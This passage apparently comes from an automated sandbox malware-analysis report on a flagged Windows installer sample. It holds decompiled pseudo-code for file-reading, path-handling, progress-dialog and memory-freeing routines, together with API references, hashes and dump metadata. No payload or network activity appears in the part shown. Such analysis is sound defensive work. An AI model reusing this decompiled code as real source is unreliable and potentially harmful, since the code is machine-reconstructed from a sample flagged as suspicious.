														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                                    0x004026ec
                                                                                    0x004026ee
                                                                                    0x004026f1
                                                                                    0x004026f3
                                                                                    0x004026f6
                                                                                    0x004026fb
                                                                                    0x004026ff
                                                                                    0x00402702
                                                                                    0x00402705
                                                                                    0x00402c2a
                                                                                    0x00402c2d
                                                                                    0x0040270b
                                                                                    0x0040270b
                                                                                    0x00402712
                                                                                    0x00402714
                                                                                    0x00402714
                                                                                    0x0040271a
                                                                                    0x0040287e
                                                                                    0x0040287e
                                                                                    0x00402881
                                                                                    0x00402886
                                                                                    0x004015b6
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00000000
                                                                                    0x00402720
                                                                                    0x00402721
                                                                                    0x0040272c
                                                                                    0x0040272f
                                                                                    0x0040273b
                                                                                    0x0040273f
                                                                                    0x004027d7
                                                                                    0x004027ef
                                                                                    0x004027ff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402745
                                                                                    0x00402745
                                                                                    0x00402748
                                                                                    0x00402749
                                                                                    0x0040274c
                                                                                    0x00402751
                                                                                    0x00402758
                                                                                    0x00402760
                                                                                    0x00000000
                                                                                    0x00402766
                                                                                    0x00402766
                                                                                    0x0040276b
                                                                                    0x00000000
                                                                                    0x00402771
                                                                                    0x00402771
                                                                                    0x00402779
                                                                                    0x0040277c
                                                                                    0x0040277f
                                                                                    0x0040283a
                                                                                    0x00402841
                                                                                    0x00402785
                                                                                    0x0040278b
                                                                                    0x00402797
                                                                                    0x00402801
                                                                                    0x00402801
                                                                                    0x00402799
                                                                                    0x00402799
                                                                                    0x0040279c
                                                                                    0x0040279e
                                                                                    0x0040279e
                                                                                    0x0040279e
                                                                                    0x004027a1
                                                                                    0x004027a6
                                                                                    0x004027a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004027ab
                                                                                    0x004027ae
                                                                                    0x004027bc
                                                                                    0x004027c2
                                                                                    0x004027d0
                                                                                    0x00000000
                                                                                    0x004027d2
                                                                                    0x00000000
                                                                                    0x004027d2
                                                                                    0x00000000
                                                                                    0x004027d0
                                                                                    0x0040279e
                                                                                    0x00402804
                                                                                    0x00402807
                                                                                    0x00000000
                                                                                    0x00402809
                                                                                    0x0040280e
                                                                                    0x0040284f
                                                                                    0x00402871
                                                                                    0x00402878
                                                                                    0x0040285d
                                                                                    0x0040285d
                                                                                    0x00402860
                                                                                    0x00402863
                                                                                    0x00402866
                                                                                    0x00402866
                                                                                    0x00000000
                                                                                    0x00402817
                                                                                    0x00402817
                                                                                    0x0040281a
                                                                                    0x0040281d
                                                                                    0x00402823
                                                                                    0x00402827
                                                                                    0x0040282a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040282a
                                                                                    0x0040280e
                                                                                    0x00402807
                                                                                    0x0040277f
                                                                                    0x0040276b
                                                                                    0x00402760
                                                                                    0x00000000
                                                                                    0x0040282c
                                                                                    0x0040282c
                                                                                    0x0040282f
                                                                                    0x00402838
                                                                                    0x00000000
                                                                                    0x0040272f
                                                                                    0x0040271a
                                                                                    0x00402c33
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                      • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                    • String ID: 9
                                                                                    • API String ID: 163830602-2366072709
                                                                                    • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                    • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                    • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                    • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                    0x004068f1
                                                                                    0x004068fa
                                                                                    0x00406911
                                                                                    0x00406911
                                                                                    0x00406918
                                                                                    0x00406924
                                                                                    0x00406924
                                                                                    0x00406927
                                                                                    0x0040692a
                                                                                    0x0040692f
                                                                                    0x00406931
                                                                                    0x0040693a
                                                                                    0x0040693e
                                                                                    0x0040695b
                                                                                    0x00406963
                                                                                    0x00406963
                                                                                    0x00406968
                                                                                    0x0040696a
                                                                                    0x0040696d
                                                                                    0x00406972
                                                                                    0x00406973
                                                                                    0x00406977
                                                                                    0x00406977
                                                                                    0x00406978
                                                                                    0x0040697f
                                                                                    0x00406981
                                                                                    0x00406988
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406990
                                                                                    0x00406996
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406996
                                                                                    0x0040699b

                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75213420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                    • CharNextW.USER32(?,00000000,75213420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                    • CharPrevW.USER32(?,?,75213420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-2977677972
                                                                                    • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                    • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                                                    • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                                                    • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				__eflags =  *0x420efc; // 0x0
				if(__eflags != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a26c;
				if(_t6 >  *0x42a26c) {
					__eflags =  *0x42a268;
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a314 & 0x00000001;
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                                                    0x0040303d
                                                                                    0x0040303f
                                                                                    0x00403046
                                                                                    0x00403049
                                                                                    0x00403049
                                                                                    0x0040304f
                                                                                    0x00000000
                                                                                    0x0040304f
                                                                                    0x00403057
                                                                                    0x0040305d
                                                                                    0x00000000
                                                                                    0x00403060
                                                                                    0x00403067
                                                                                    0x0040306d
                                                                                    0x00403073
                                                                                    0x00403075
                                                                                    0x0040307b
                                                                                    0x004030b9
                                                                                    0x004030c2
                                                                                    0x00000000
                                                                                    0x004030c7
                                                                                    0x0040307d
                                                                                    0x00403084
                                                                                    0x00403095
                                                                                    0x00000000
                                                                                    0x004030a3
                                                                                    0x00403084
                                                                                    0x004030cf

                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                                                    • GetTickCount.KERNEL32 ref: 00403067
                                                                                    • wsprintfW.USER32 ref: 00403095
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                                      • Part of subcall function 00403012: MulDiv.KERNEL32(000D0FA7,00000064,000D19C2), ref: 00403027
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                    • String ID: ... %d%%
                                                                                    • API String ID: 722711167-2449383134
                                                                                    • Opcode ID: ad94e6eeeea8a1cbe270cf80bb920a468dc55bb5e304c2627f90dd203c68164d
                                                                                    • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                                                    • Opcode Fuzzy Hash: ad94e6eeeea8a1cbe270cf80bb920a468dc55bb5e304c2627f90dd203c68164d
                                                                                    • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                    0x00404f8d
                                                                                    0x00404f9a
                                                                                    0x00404fa0
                                                                                    0x00404fde
                                                                                    0x00404fde
                                                                                    0x00404fed
                                                                                    0x00404ff4
                                                                                    0x00000000
                                                                                    0x00404ff6
                                                                                    0x00404fa2
                                                                                    0x00404fb1
                                                                                    0x00404fb9
                                                                                    0x00404fbc
                                                                                    0x00404fce
                                                                                    0x00404fd4
                                                                                    0x00404fdb
                                                                                    0x00000000
                                                                                    0x00404fdb
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                                                    • GetMessagePos.USER32 ref: 00404FA2
                                                                                    • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                    • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                                                    • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                    • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                                    0x00402fa3
                                                                                    0x00402fb1
                                                                                    0x00402fb7
                                                                                    0x00402fb7
                                                                                    0x00402fc5
                                                                                    0x00402fc7
                                                                                    0x00402fd3
                                                                                    0x00402fd8
                                                                                    0x00402fda
                                                                                    0x00402fda
                                                                                    0x00402fe5
                                                                                    0x00402ff5
                                                                                    0x00403007
                                                                                    0x00403007
                                                                                    0x0040300f

                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                    • wsprintfW.USER32 ref: 00402FE5
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                    • API String ID: 1451636040-1158693248
                                                                                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                                                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                                                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E22655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E70E22655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E70E212BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M70E22784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x70e2407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x70e2409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E70E21510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x70e2506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x70e2506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x70e2506c);
								goto L17;
							case 5:
								_push( *0x70e2506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x70e25000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E70E21381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E70E21312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}











                                                                                    0x70e2265f
                                                                                    0x70e22661
                                                                                    0x70e22665
                                                                                    0x70e22674
                                                                                    0x70e22678
                                                                                    0x70e2267d
                                                                                    0x70e2267d
                                                                                    0x70e22685
                                                                                    0x70e2268c
                                                                                    0x70e22692
                                                                                    0x00000000
                                                                                    0x70e22699
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e226a1
                                                                                    0x70e226a5
                                                                                    0x70e226a8
                                                                                    0x70e226ac
                                                                                    0x70e226b3
                                                                                    0x70e226b7
                                                                                    0x70e226bd
                                                                                    0x70e226bf
                                                                                    0x70e226c1
                                                                                    0x70e226c1
                                                                                    0x70e226c8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e226d1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e226d8
                                                                                    0x70e226de
                                                                                    0x70e226e8
                                                                                    0x70e226ee
                                                                                    0x70e226f3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22714
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e226fa
                                                                                    0x70e22700
                                                                                    0x70e22701
                                                                                    0x70e22703
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2271c
                                                                                    0x70e2271e
                                                                                    0x70e22724
                                                                                    0x70e2272a
                                                                                    0x70e2272a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e22692
                                                                                    0x70e2272d
                                                                                    0x70e2272d
                                                                                    0x70e22732
                                                                                    0x70e22743
                                                                                    0x70e22743
                                                                                    0x70e22749
                                                                                    0x70e2274e
                                                                                    0x70e22753
                                                                                    0x70e2275f
                                                                                    0x70e22764
                                                                                    0x00000000
                                                                                    0x70e22769
                                                                                    0x70e22755
                                                                                    0x70e22756
                                                                                    0x70e2276a
                                                                                    0x70e2276a
                                                                                    0x70e22753
                                                                                    0x70e2276b
                                                                                    0x70e2276c
                                                                                    0x70e2276f
                                                                                    0x70e22783

                                                                                    APIs
                                                                                      • Part of subcall function 70E212BB: GlobalAlloc.KERNEL32(00000040,?,70E212DB,?,70E2137F,00000019,70E211CA,-000000A0), ref: 70E212C5
                                                                                    • GlobalFree.KERNEL32(?), ref: 70E22743
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E22778
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: 8a8f81b975bd02d41c6f814379f78aa4b3ba9d8beaa22f607c59cf19b2a0919f
                                                                                    • Instruction ID: 4c25ed45db0ea2c68f98aeeea2a8e29e21cf451f26b81047049888c8b2a6ec4c
                                                                                    • Opcode Fuzzy Hash: 8a8f81b975bd02d41c6f814379f78aa4b3ba9d8beaa22f607c59cf19b2a0919f
                                                                                    • Instruction Fuzzy Hash: DA31CF76508905EFC7168F65ED84D2E77BEFB85306324452EF20283221C7B0684AEB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E00402950(void* __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
